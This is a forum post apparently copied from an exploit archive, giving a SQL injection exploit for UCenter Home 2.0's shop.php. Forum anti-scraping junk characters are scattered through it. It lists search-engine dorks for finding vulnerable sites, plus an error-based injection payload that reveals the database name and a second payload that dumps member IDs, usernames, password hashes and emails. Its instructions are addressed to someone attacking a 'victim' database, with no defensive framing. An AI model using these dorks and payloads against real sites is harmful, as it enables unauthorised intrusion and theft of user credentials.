中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]
作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
, Y! G4 j; C  K- q
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
- I8 P9 `6 A& y) x
" I6 e; B% U" `9 N* C1 n                                 ( e1 b& _: T8 g$ l1 N
: v$ I- l1 M/ s- |
*/ Author : KnocKout  " ~; r0 X" R2 W; a3 h; `! k
; x% q$ Q* m6 ^+ C
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  0 o7 u. M% j1 a2 b/ ~
2 P5 Z+ o3 x) s" V9 B9 C5 W7 K
*/ Contact: knockoutr@msn.com  3 E, }% ?0 `/ l# I3 k$ X

) a$ l7 D" a' ?& v% T0 N+ n*/ Cyber-Warrior.org/CWKnocKout  " Q; r$ y+ M9 A& z: K

1 _" [0 ~/ n% S! _- l& p0 w__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
3 V( s6 ]/ e% T0 t. m. ?  {; U+ c+ E
Script : UCenter Home  0 f& ^2 O2 l$ b
7 ~! A' {6 i- w: O
Version : 2.0  - l7 a5 \5 S# x) |2 |; ~/ C# \
: h! B+ G6 i: v1 J8 I6 Z$ K
Script HomePage : http://u.discuz.net/  
: E( o- [- `! t0 M) P6 ~# S! W
6 |& I3 D5 n7 w+ R$ S; U__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ) X) ~( K/ T, \( S
3 Z- f* ?2 W; Y$ B' T$ q
Dork : Powered by UCenter inurl:shop.php?ac=view  0 }" y" D8 g) }( _

7 c  n  H7 M0 PDork 2 : inurl:shop.php?ac=view&shopid=  
9 T9 c( F) D; w- w1 p
/ ~  S; t0 k2 y/ P, [__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  * T4 V7 g6 M9 f# A! b" d2 G
% ?+ F. x8 Q4 \8 ]+ y
Vuln file : Shop.php  + ~% `. q) K7 A/ V, S

, r- q/ E) \! r9 a  Qvalue's : (?)ac=view&shopid=  
# Q& P% v$ h4 [# L. s3 g0 K- @$ q" x5 c/ O1 d- X
Vulnerable Style : SQL Injection (MySQL Error Based)  ! _6 ^' W' M3 m# C$ Q0 V1 w- C
8 l* s! Z1 d5 {' s1 D
Need Metarials : Hex Conversion  " D7 G- C2 ^/ c

# F. `. N- p6 l8 a__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
, F& H9 N- m! c  V2 ]8 \8 s" S4 Z* K% f# E2 T4 Z
Your Need victim Database name.     x! r3 S/ j2 [/ q

+ a1 r# [/ R* T2 kfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  2 C( T% t* L" ^

  J+ c, |: |' [' N2 J; u..  
- ~7 v# w) q# Y
5 K* b  @; q* G  {DB : Okey.  . ^' n( y8 w6 R6 ^5 ?8 r' p
/ y) T6 ?1 R: w  _: G& K
your edit DB `[TARGET DB NAME]`  
6 Y. W$ T5 B1 w6 p) T: V$ z" G( \
4 T" b8 D/ Y% T  p8 EExample : 'hiwir1_ucenter'  8 b# d/ W5 B! c0 [8 n
! p. ~9 v% U8 k  n3 r
Edit : Okey.  5 X- j6 @' J# h" |8 i1 S

5 l' ?1 s/ O. I& Z0 ZYour use Hex conversion. And edit Your SQL Injection Exploit..  6 \" G- {! X+ y& H
& w; h5 x# |$ e. @
   . i4 q  R0 g1 }' s4 E# m
7 k( c& p+ Y3 I$ z- L* c2 c
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  ( H4 p; t9 m* B1 D




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2